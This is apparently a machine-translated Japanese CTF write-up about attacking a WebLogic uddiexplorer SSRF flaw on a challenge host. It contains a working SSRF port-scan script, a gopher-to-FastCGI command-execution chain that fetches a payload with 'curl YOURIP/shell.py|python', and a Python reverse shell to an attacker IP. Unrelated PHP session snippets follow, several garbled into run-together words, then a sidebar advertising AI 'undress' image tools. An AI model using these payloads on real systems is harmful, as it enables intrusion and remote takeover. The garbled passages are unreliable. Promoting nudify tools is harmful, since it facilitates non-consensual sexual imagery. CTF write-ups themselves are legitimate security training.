3 つの白い帽子 - 星からあなたを探して - 第 1 号
チャレンジの紹介
星からあなたを失った、必要かも知れません、すべて使います私の才能はあなたを取り戻すために 2 つの文を作成しましたが、続けることができませんでした。これは非常に単純な質問であることは認めます。
チャレンジターゲット
http://0761e975dda0c67cb.jie.sangebaimao.com/
0x01 情報収集
アドレスを開いてください、dzフォーラムです。あまり面白くないようですが、まだ最新バージョンです。
せっかく潜入したので、必殺兵器「スキャンディレクトリ」を使ってみたいと思います! (辞書が鍵です)
重要な情報はすぐに取得できました (dz のオリジナルのディレクトリとページを除く)
/info.php/uddiexplorer/
1 つは phpinfo() 情報、非常に役立ちます。
/opt/discuz/info.php
もう 1 つは Weblogic に関するものです。
決定的な Baidu 「uddiexplorer の脆弱性」 を確認すると、weblogic uddiexplorer に SSRF の脆弱性があることがすぐにわかります。
この浸透の鍵は SSRF にあります! ! !
脆弱性の悪用
SSRF は、3 つのホワイト ハット エンチャント Docker を組み合わせて 127.0.0.1 を作成するだけではありません。
万能の Baidu、キーワード 「SearchPublicRegistries ssrf vulnerability exp」を検索
http://www.tuicool.com/articles/UjaqIbz を入手
スクリプトを入手し、自分で変更して使用してください! ! !
Port scan.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str): url = 'http://0761e975dda0c67cb.jie.sangebaimao.com' ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',) for port in ports: exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port) try: response = requests.get(exp_url, timeout=15, verify=False) re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content) re_sult2 = re.findall('but could not connect',response.content) if len(re_sult1)!=0 and len(re_sult2)==0: print ip_str+':'+port except Exception, e: passif __name__ == "__main__": scan('127.0.0.1')
ポート 22、80、3306、7001、9000 などが正常に検出されました。
SSRF+GOPHER は常に素晴らしく、最近さらに人気が高まっています。
または Baidu~~
rr Chicory の最新記事「Do Evil Things with gopher://」
0x03 Attack FastCGI
一般的に、FastCGI は 127.0.0.1 ポートにバインドされていますが、Gopher+SSRF を使用すると、FastCGI を完全に攻撃して任意のコマンドを実行できます。
0x06 リファレンス
PHP FastCGI のリモート利用コマンド実行
fcgi_exp のダウンロード
実行
nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php
ペイロードをx.txtに保存します
リバウンドシェルのブラックテクノロジー、bashリバウンドは無効です~~
次にペイロードをurlencodeしてssrf.php
シェルを生成します。 py
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("yourip",9999)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"]);
gopher.php
<?php$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");?>
エクスプロイト ファイル ssrf.php が正常に生成されました
リバウンド シェル
VPS が実行中
nc -lvv 9999
SSRF を使用してください
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php
リバウンド成功~~~
GETFLAG
自分で見つけてください

PHPでは、session_status()またはsession_id()を使用して、セッションが開始されたかどうかを確認できます。 1)session_status()関数を使用します。 php_session_activeが返された場合、セッションが開始されました。 2)SESSION_ID()関数を使用します。空の文字列が返された場合、セッションが開始されます。どちらの方法でもセッション状態を効果的に確認でき、使用する方法を選択することは、PHPバージョンと個人的な好みに依存します。

Sessionsionsionsarevitalinwebapplications、特にコマースプラットフォームの前。

PHPでの同時セッションアクセスの管理は、次の方法で実行できます。1。データベースを使用してセッションデータを保存します。これらの方法は、データの一貫性を確保し、並行性のパフォーマンスを向上させるのに役立ちます。

phpsessionshaveverallimitations:1)storagecconstraintscanleadtoperformanceissues; 2)securityvulnerablesliasitylikessessionfixationAttacksicexist;

負荷分散はセッション管理に影響しますが、セッションの複製、セッションの粘着性、集中セッションストレージで解決できます。 1。セッションレプリケーションサーバー間のセッションデータをコピーします。 2。セッションスティンネスは、ユーザーリクエストを同じサーバーに指示します。 3.集中セッションストレージは、Redisなどの独立したサーバーを使用してセッションデータを保存してデータ共有を確保します。

SESSIONLOCKINGISATECHNIQUESTOESUREAUSER'SSESSIONREMAINSEXCLUSIVETOONEUSATIME.ITISCRUCIALFORPREVENTINGDATACORTIONANDSECURITYBREACHESINMULTI-USERAPPLICATIONS.SESSIONLOCKINGISISIMPLEMENTEDUSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGSINGROCKINGSMECHANISMなど

PHPセッションの代替品には、Cookie、トークンベースの認証、データベースベースのセッション、Redis/Memcachedが含まれます。 1.Cookiesは、クライアントにデータを保存することによりセッションを管理します。 2.トークンベースの認証はトークンを使用してユーザーを検証します。これは非常に安全ですが、追加のロジックが必要です。 3.Databaseベースのセッションは、データベースにデータを保存します。これは、スケーラビリティが良好ですが、パフォーマンスに影響を与える可能性があります。 4. Redis/Memcachedは分散キャッシュを使用してパフォーマンスとスケーラビリティを向上させますが、追加のマッチングが必要です

SessionHijackingとは、ユーザーのSessionIDを取得してユーザーになりすましている攻撃者を指します。予防方法には、次のものが含まれます。1)HTTPSを使用した通信の暗号化。 2)SessionIDのソースの検証。 3)安全なSessionID生成アルゴリズムの使用。 4)SessionIDを定期的に更新します。


ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

人気の記事

ホットツール

WebStorm Mac版
便利なJavaScript開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

PhpStorm Mac バージョン
最新(2018.2.1)のプロフェッショナル向けPHP統合開発ツール

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SAP NetWeaver Server Adapter for Eclipse
Eclipse を SAP NetWeaver アプリケーション サーバーと統合します。

ホットトピック









